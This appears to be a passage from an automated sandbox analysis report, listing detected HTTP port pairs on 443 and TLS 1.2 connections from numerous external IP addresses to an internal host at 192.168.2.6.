Source: unknown	Network traffic detected: HTTP traffic on port 57952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58355 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65286 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53610
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64507
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63652
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59162
Source: unknown	Network traffic detected: HTTP traffic on port 52200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62615 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63653
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61477
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64745
Source: unknown	Network traffic detected: HTTP traffic on port 50885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62408 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52590 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51209
Source: unknown	Network traffic detected: HTTP traffic on port 63031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60394
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62330
Source: unknown	Network traffic detected: HTTP traffic on port 57207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61001
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54728
Source: unknown	Network traffic detected: HTTP traffic on port 55043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55819
Source: unknown	Network traffic detected: HTTP traffic on port 59812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55817
Source: unknown	Network traffic detected: HTTP traffic on port 63987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65302 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62450 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59605 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62340
Source: unknown	Network traffic detected: HTTP traffic on port 51945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62345
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61014
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49389
Source: unknown	Network traffic detected: HTTP traffic on port 61709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49386
Source: unknown	Network traffic detected: HTTP traffic on port 64125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57178
Source: unknown	Network traffic detected: HTTP traffic on port 62557 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58020
Source: unknown	Network traffic detected: HTTP traffic on port 51988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58260
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62512
Source: unknown	Network traffic detected: HTTP traffic on port 57033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51635
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49373
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51871
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51874
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59368
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58273
Source: unknown	Network traffic detected: HTTP traffic on port 52013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58276
Source: unknown	Network traffic detected: HTTP traffic on port 65296 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51402
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51644
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51884
Source: unknown	Network traffic detected: HTTP traffic on port 50630 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57199
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64957
Source: unknown	Network traffic detected: HTTP traffic on port 58511 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58045
Source: unknown	Network traffic detected: HTTP traffic on port 56942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50325
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51414
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51899
Source: unknown	Network traffic detected: HTTP traffic on port 53909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57324 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62624 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59397 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 60729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51394
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65302
Source: unknown	Network traffic detected: HTTP traffic on port 49342 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52008
Source: unknown	Network traffic detected: HTTP traffic on port 54728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52244
Source: unknown	Network traffic detected: HTTP traffic on port 65226 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54422
Source: unknown	Network traffic detected: HTTP traffic on port 61563 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52246
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54424
Source: unknown	Network traffic detected: HTTP traffic on port 52341 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55355 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52251
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52010
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63393
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52255
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52253
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52257
Source: unknown	Network traffic detected: HTTP traffic on port 53276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52016
Source: unknown	Network traffic detected: HTTP traffic on port 56026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57950
Source: unknown	Network traffic detected: HTTP traffic on port 64268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51173
Source: unknown	Network traffic detected: HTTP traffic on port 57673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49273 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65326
Source: unknown	Network traffic detected: HTTP traffic on port 63045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64010
Source: unknown	Network traffic detected: HTTP traffic on port 61001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49273
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52268
Source: unknown	Network traffic detected: HTTP traffic on port 51209 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51232 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51344
Source: unknown	Network traffic detected: HTTP traffic on port 53665 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59072
Source: unknown	Network traffic detected: HTTP traffic on port 57950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64587 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63325
Source: unknown	Network traffic detected: HTTP traffic on port 62180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52200
Source: unknown	Network traffic detected: HTTP traffic on port 52996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64663
Source: unknown	Network traffic detected: HTTP traffic on port 65216 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62488
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63336
Source: unknown	Network traffic detected: HTTP traffic on port 50468 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57906
Source: unknown	Network traffic detected: HTTP traffic on port 63686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53544
Source: unknown	Network traffic detected: HTTP traffic on port 49489 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65408 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57316 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63341
Source: unknown	Network traffic detected: HTTP traffic on port 51793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62498
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51375
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56824
Source: unknown	Network traffic detected: HTTP traffic on port 59728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50375 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57284 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63111
Source: unknown	Network traffic detected: HTTP traffic on port 63652 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52647 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59700
Source: unknown	Network traffic detected: HTTP traffic on port 51820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57321 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57772
Source: unknown	Network traffic detected: HTTP traffic on port 50947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59422 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60932
Source: unknown	Network traffic detected: HTTP traffic on port 62467 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55355
Source: unknown	Network traffic detected: HTTP traffic on port 56706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56695
Source: unknown	Network traffic detected: HTTP traffic on port 59525 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64068
Source: unknown	Network traffic detected: HTTP traffic on port 63111 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59645 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60941
Source: unknown	Network traffic detected: HTTP traffic on port 61610 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54279
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59728
Source: unknown	Network traffic detected: HTTP traffic on port 58967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57305
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53194
Source: unknown	Network traffic detected: HTTP traffic on port 52016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62340 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57796
Source: unknown	Network traffic detected: HTTP traffic on port 49386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57792
Source: unknown	Network traffic detected: HTTP traffic on port 60926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56229
Source: unknown	Network traffic detected: HTTP traffic on port 56178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57316
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57321
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57322
Source: unknown	Network traffic detected: HTTP traffic on port 59582 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51402 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59515 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55309
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64264
Source: unknown	Network traffic detected: HTTP traffic on port 65445 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59152 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51635 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53368
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54457
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53370
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56881
Source: unknown	Network traffic detected: HTTP traffic on port 54552 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 57446 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65343
Source: unknown	Network traffic detected: HTTP traffic on port 57761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58351 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64273
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60905
Source: unknown	Network traffic detected: HTTP traffic on port 56120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54465
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57979
Source: unknown	Network traffic detected: HTTP traffic on port 64352 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51414 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57741
Source: unknown	Network traffic detected: HTTP traffic on port 60902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60902
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64268
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63194
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60917
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64044
Source: unknown	Network traffic detected: HTTP traffic on port 53994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57743
Source: unknown	Network traffic detected: HTTP traffic on port 51284 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58341 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63187
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60926
Source: unknown	Network traffic detected: HTTP traffic on port 51972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59940
Source: unknown	Network traffic detected: HTTP traffic on port 59830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52075
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60924
Source: unknown	Network traffic detected: HTTP traffic on port 60271 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62330 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51942
Source: unknown	Network traffic detected: HTTP traffic on port 58352 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51943
Source: unknown	Network traffic detected: HTTP traffic on port 61602 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51947
Source: unknown	Network traffic detected: HTTP traffic on port 65484 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60892

Source: unknown	HTTPS traffic detected: 104.21.33.54:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.54:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.54:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.54:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.54:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 130.225.244.90:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.54:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.54:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.54:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.54:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.252.102.119:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.58.81.140:443 -> 192.168.2.6:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.23.244.244:443 -> 192.168.2.6:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.211.136.23:443 -> 192.168.2.6:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.177.252.5:443 -> 192.168.2.6:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.185.159.145:443 -> 192.168.2.6:50937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:50942 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.147.96.4:443 -> 192.168.2.6:50947 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.39.146.199:443 -> 192.168.2.6:51344 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:50970 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.160.0.208:443 -> 192.168.2.6:50971 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:51791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:51375 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.152:443 -> 192.168.2.6:51874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.230.63.186:443 -> 192.168.2.6:51794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.224.182.253:443 -> 192.168.2.6:51901 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:51748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.224.182.253:443 -> 192.168.2.6:51871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:52010 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.185.159.145:443 -> 192.168.2.6:51947 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.152:443 -> 192.168.2.6:51882 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.224.182.253:443 -> 192.168.2.6:52009 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:51900 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 62.210.211.126:443 -> 192.168.2.6:51848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.230.63.186:443 -> 192.168.2.6:51827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:51803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:50982 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:51754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:50932 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.75.101.58:443 -> 192.168.2.6:51742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:52008 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.236.62.147:443 -> 192.168.2.6:51764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.40.92.90:443 -> 192.168.2.6:51738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.107.32.28:443 -> 192.168.2.6:51943 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.186.33.4:443 -> 192.168.2.6:51898 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:51918 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.224.182.253:443 -> 192.168.2.6:52014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.107.56.198:443 -> 192.168.2.6:51884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:52268 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:52255 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 208.109.43.169:443 -> 192.168.2.6:51824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.230.63.107:443 -> 192.168.2.6:51944 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 178.33.253.225:443 -> 192.168.2.6:52244 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.107.56.198:443 -> 192.168.2.6:51899 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.47.2.70:443 -> 192.168.2.6:52246 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.216.197:443 -> 192.168.2.6:51946 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.214.145.11:443 -> 192.168.2.6:52251 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.26.61.200:443 -> 192.168.2.6:52253 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:51917 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 59.106.13.100:443 -> 192.168.2.6:51818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.215.240.240:443 -> 192.168.2.6:51868 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 109.71.40.107:443 -> 192.168.2.6:51938 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:51885 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 223.29.45.22:443 -> 192.168.2.6:52186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 221.121.158.21:443 -> 192.168.2.6:52341 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.161.71.77:443 -> 192.168.2.6:51865 version: TLS 1.2
